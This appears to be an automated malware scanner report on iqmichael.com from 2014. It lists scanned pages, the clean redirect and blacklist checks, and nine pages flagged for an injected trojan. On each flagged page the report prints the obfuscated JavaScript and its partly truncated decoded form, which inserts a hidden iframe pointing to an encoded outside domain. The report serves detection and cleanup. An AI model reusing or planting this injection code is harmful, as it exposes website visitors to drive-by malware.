Malware Scanner report for iqmichael.com

Malicious/Suspicious/Total urls checked: 9/0/15

9 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://iqmichael.com/	200 OK Content-Length: 6674 Content-Type: text/html	clean
http://iqmichael.com/Scripts/swfobject_modified.js	200 OK Content-Length: 21611 Content-Type: application/javascript	clean
http://iqmichael.com/index.html	200 OK Content-Length: 6674 Content-Type: text/html	clean
http://iqmichael.com/tourdates.html	200 OK Content-Length: 12623 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 ... 3000 bytes are skipped ...69,108,101,109,101,110,116,39,93,40,34,105,102,114,97,109,101,34,41,59,10,32,32,32,32,32,32,32,32,32,32,32,32,100,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,59,10,9,9,9,98,91,39,97,112,112,101,110,100,67,104,105,108,100,39,93,40,100,41,10,32,32,32,32,32,32,32,32,125,32,101,108,115,101,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,97,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,10,9,125,10,32,125,10,60,47,115,99,114,105,112,116,62)); Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x ... 1890 bytes are skipped ...e")[0]; if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports: Microsoft Trojan:JS/Iframe.EK
http://iqmichael.com/video_audio.html	200 OK Content-Length: 3769 Content-Type: text/html	clean
http://iqmichael.com/photo_gallery.html	200 OK Content-Length: 13509 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 ... 3000 bytes are skipped ...69,108,101,109,101,110,116,39,93,40,34,105,102,114,97,109,101,34,41,59,10,32,32,32,32,32,32,32,32,32,32,32,32,100,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,59,10,9,9,9,98,91,39,97,112,112,101,110,100,67,104,105,108,100,39,93,40,100,41,10,32,32,32,32,32,32,32,32,125,32,101,108,115,101,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,97,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,10,9,125,10,32,125,10,60,47,115,99,114,105,112,116,62)); Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x ... 1890 bytes are skipped ...e")[0]; if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports: Microsoft Trojan:JS/Iframe.EK
http://iqmichael.com/contact.html	200 OK Content-Length: 13043 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 ... 3000 bytes are skipped ...69,108,101,109,101,110,116,39,93,40,34,105,102,114,97,109,101,34,41,59,10,32,32,32,32,32,32,32,32,32,32,32,32,100,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,59,10,9,9,9,98,91,39,97,112,112,101,110,100,67,104,105,108,100,39,93,40,100,41,10,32,32,32,32,32,32,32,32,125,32,101,108,115,101,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,97,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,10,9,125,10,32,125,10,60,47,115,99,114,105,112,116,62)); Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x ... 1890 bytes are skipped ...e")[0]; if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports: Microsoft Trojan:JS/Iframe.EK
http://iqmichael.com/links.html	200 OK Content-Length: 11739 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 ... 3000 bytes are skipped ...69,108,101,109,101,110,116,39,93,40,34,105,102,114,97,109,101,34,41,59,10,32,32,32,32,32,32,32,32,32,32,32,32,100,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,59,10,9,9,9,98,91,39,97,112,112,101,110,100,67,104,105,108,100,39,93,40,100,41,10,32,32,32,32,32,32,32,32,125,32,101,108,115,101,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,97,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,10,9,125,10,32,125,10,60,47,115,99,114,105,112,116,62)); Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x ... 1890 bytes are skipped ...e")[0]; if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports: Microsoft Trojan:JS/Iframe.EK
http://iqmichael.com/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://iqmichael.com/video1.html	200 OK Content-Length: 14606 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 ... 3000 bytes are skipped ...69,108,101,109,101,110,116,39,93,40,34,105,102,114,97,109,101,34,41,59,10,32,32,32,32,32,32,32,32,32,32,32,32,100,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,59,10,9,9,9,98,91,39,97,112,112,101,110,100,67,104,105,108,100,39,93,40,100,41,10,32,32,32,32,32,32,32,32,125,32,101,108,115,101,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,97,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,10,9,125,10,32,125,10,60,47,115,99,114,105,112,116,62)); Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x ... 1890 bytes are skipped ...e")[0]; if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports: Microsoft Trojan:JS/Iframe.EK
http://iqmichael.com/video2.html	200 OK Content-Length: 14620 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 ... 3000 bytes are skipped ...69,108,101,109,101,110,116,39,93,40,34,105,102,114,97,109,101,34,41,59,10,32,32,32,32,32,32,32,32,32,32,32,32,100,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,59,10,9,9,9,98,91,39,97,112,112,101,110,100,67,104,105,108,100,39,93,40,100,41,10,32,32,32,32,32,32,32,32,125,32,101,108,115,101,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,97,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,10,9,125,10,32,125,10,60,47,115,99,114,105,112,116,62)); Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x ... 1890 bytes are skipped ...e")[0]; if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports: Microsoft Trojan:JS/Iframe.EK
http://iqmichael.com/store/music.html	200 OK Content-Length: 21685 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 ... 3000 bytes are skipped ...69,108,101,109,101,110,116,39,93,40,34,105,102,114,97,109,101,34,41,59,10,32,32,32,32,32,32,32,32,32,32,32,32,100,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,59,10,9,9,9,98,91,39,97,112,112,101,110,100,67,104,105,108,100,39,93,40,100,41,10,32,32,32,32,32,32,32,32,125,32,101,108,115,101,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,97,46,115,114,99,32,61,32,119,105,110,100,111,119,46,117,114,108,100,97,116,97,10,9,125,10,32,125,10,60,47,115,99,114,105,112,116,62)); Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x ... 1890 bytes are skipped ...e")[0]; if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports: Microsoft Trojan:JS/Iframe.EK
http://iqmichael.com/store/niftyplayer.js	200 OK Content-Length: 11210 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<script>document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101 ... 3253 bytes are skipped ...> if (ps == 'stopped') if (ls == 'empty') return ls; if (ls == 'error') return ls; else return ps; return ps; }; this.getPlayingState = function () { return this.obj.GetVariable('playingState'); }; this.getLoadingState = function () { return this.obj.GetVariable('loadingState'); }; this.registerEvent = function (eventName, action) { this.obj.SetVariable(eventName, action); }; return this; } Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x ... 1890 bytes are skipped ...e")[0]; if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports: Microsoft Trojan:JS/Iframe.EK
http://iqmichael.com/store/SpryAssets/SpryTabbedPanels.js	200 OK Content-Length: 19299 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<script>document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101 ... 3263 bytes are skipped ...this.addClassName(panels[tpIndex], this.panelVisibleClass); panels[tpIndex].style.display = "block"; this.currentTabIndex = tpIndex; }; Spry.Widget.TabbedPanels.prototype.attachBehaviors = function(element) { var tabs = this.getTabs(); var panels = this.getContentPanels(); var panelCount = this.getTabbedPanelCount(); for (var i = 0; i < panelCount; i++) this.addPanelEventListeners(tabs[i], panels[i]); this.showPanel(this.defaultTab); }; Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x ... 1890 bytes are skipped ...e")[0]; if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports: Microsoft Trojan:JS/Iframe.EK
http://iqmichael.com/store/../index.html	200 OK Content-Length: 6674 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: iqmichael.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 12 Aug 2014 19:00:17 GMT
Accept-Ranges: bytes
ETag: "1a12-4d381ad71c940"
Server: Apache/2.4.9 (Fedora) OpenSSL/1.0.1e-fips PHP/5.5.13
Content-Length: 6674
Content-Type: text/html; charset=UTF-8
Last-Modified: Thu, 17 Jan 2013 20:17:01 GMT

...6674 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: iqmichael.com
Referer: http://www.google.com/search?q=iqmichael.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=iqmichael.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://iqmichael.com/

Result: iqmichael.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for iqmichael.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools